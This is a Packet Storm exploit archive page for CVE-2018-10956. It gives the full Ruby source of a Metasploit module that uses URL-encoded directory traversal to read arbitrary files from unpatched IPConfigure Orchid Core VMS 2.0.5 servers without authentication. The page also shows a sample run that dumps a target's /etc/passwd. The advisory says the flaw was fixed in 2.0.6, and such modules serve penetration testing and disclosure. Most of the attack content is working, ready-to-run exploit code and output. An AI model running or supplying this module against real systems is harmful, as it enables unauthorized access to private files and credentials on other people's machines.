what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

IPConfigure Orchid VMS 2.0.5 Directory Traversal / Information Disclosure

IPConfigure Orchid VMS 2.0.5 Directory Traversal / Information Disclosure
Posted Jun 21, 2018
Authored by Sanjiv Kawa | Site metasploit.com

Orchid Core VMS is vulnerable to a directory traversal attack. This affects Linux and Windows operating systems. This allows a remote, unauthenticated attacker to send crafted GET requests to the application, which results in the ability to read arbitrary files outside of the applications web directory. This issue is further compounded as the Linux version of Orchid Core VMS application is running in context of a user in the sudoers group. As such, any file on the underlying system, for which the location is known, can be read. This Metasploit module was tested against 2.0.5. This has been fixed in 2.0.6.

tags | exploit, remote, web, arbitrary, file inclusion
systems | linux, windows
advisories | CVE-2018-10956
SHA-256 | 88fb47c426ab72726184cd69a9d07190839101e253c7eeff53954ee9a10a4136

IPConfigure Orchid VMS 2.0.5 Directory Traversal / Information Disclosure

Change Mirror Download
require 'msf/core'

class MetasploitModule < Msf::Auxiliary
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient

def initialize(info = {})
super(update_info(info,
'Name' => 'IPConfigure Orchid VMS <=2.0.5 Directory Traversal Information Disclosure',
'Description' => %q{
Orchid Core VMS is vulnerable to a directory traversal attack. This affects Linux and Windows operating systems. This allows a remote, unauthenticated attacker to send crafted GET requests to the application, which results in the ability to read arbitrary files outside of the applications web directory. This issue is further compounded as the Linux version of Orchid Core VMS application is running in context of a user in the sudoers group. As such, any file on the underlying system, for which the location is known, can be read.

This module was tested against 2.0.5. This has been fixed in 2.0.6.
},
'Author' => [ 'Sanjiv Kawa @kawabungah' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2018-10956' ],
[ 'URL', 'https://labs.nettitude.com/blog/cve-2018-10956-unauthenticated-privileged-directory-traversal-in-ipconfigure-orchid-core-vms/' ],
[ 'URL', 'http://ipconfigure.com/products/orchid-archives' ]
],
'DisclosureDate' => 'May 7, 2018'))

register_options(
[
OptString.new('TARGETURI', [true, 'The base path to Orchid VMS', '/']),
OptString.new('FILE', [ true, 'This is the file to download', '/etc/passwd']),
OptString.new('INPUTFILE', [ false, 'Specify a list of files to download']),
Opt::RPORT(80)
], self.class )
end

def init_request(path)
res = send_request_cgi({
'method' => 'GET',
'uri' => path
})

return res
end

def run
path = normalize_uri(target_uri.path)
res = init_request(path)

if res && res.code == 200
file = Array.new
trigger = "%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F"


if datastore['INPUTFILE'].nil? || datastore['INPUTFILE'].empty?
file = [datastore['FILE']]
else
file = File.open([datastore['INPUTFILE']].join(', ').to_s).readlines
end

for i in 0 .. file.length - 1
path = normalize_uri(target_uri.path) + trigger + file[i]
res = init_request(path)

if res.code == 200
print_good("Obtained #{datastore['FILE']}")
puts res.body
puts ""
else
print_error("#{datastore['FILE']} does not exist")
puts res.body
puts ""
end
end
else
print_error("Web Server is Unresponsive")
end
end
end
__END__
msf auxiliary(scanner/http/orchid_core_vms_directory_traversal) > show options

Module options (auxiliary/scanner/http/orchid_core_vms_directory_traversal):

Name Current Setting Required Description
---- --------------- -------- -----------
FILE /etc/passwd yes This is the file to download
INPUTFILE no Specify a list of files to downloads
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOST 10.100.100.100 yes The target address
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The base path to Orchid VMS
VHOST no HTTP server virtual host

msf auxiliary(scanner/http/orchid_core_vms_directory_traversal) > run

[+] Obtained /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
messagebus:x:107:111::/var/run/dbus:/bin/false
uuidd:x:108:112::/run/uuidd:/bin/false
dnsmasq:x:109:65534:dnsmasq,,,:/var/lib/misc:/bin/false
sshd:x:110:65534::/var/run/sshd:/usr/sbin/nologin
pollinate:x:111:1::/var/cache/pollinate:/bin/false
ubuntu:x:1000:1000:Ubuntu:/home/ubuntu:/bin/bash

Login or Register to add favorites

File Archive:

July 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    52 Files
  • 2
    Jul 2nd
    0 Files
  • 3
    Jul 3rd
    0 Files
  • 4
    Jul 4th
    0 Files
  • 5
    Jul 5th
    0 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    0 Files
  • 9
    Jul 9th
    0 Files
  • 10
    Jul 10th
    0 Files
  • 11
    Jul 11th
    0 Files
  • 12
    Jul 12th
    0 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    0 Files
  • 16
    Jul 16th
    0 Files
  • 17
    Jul 17th
    0 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close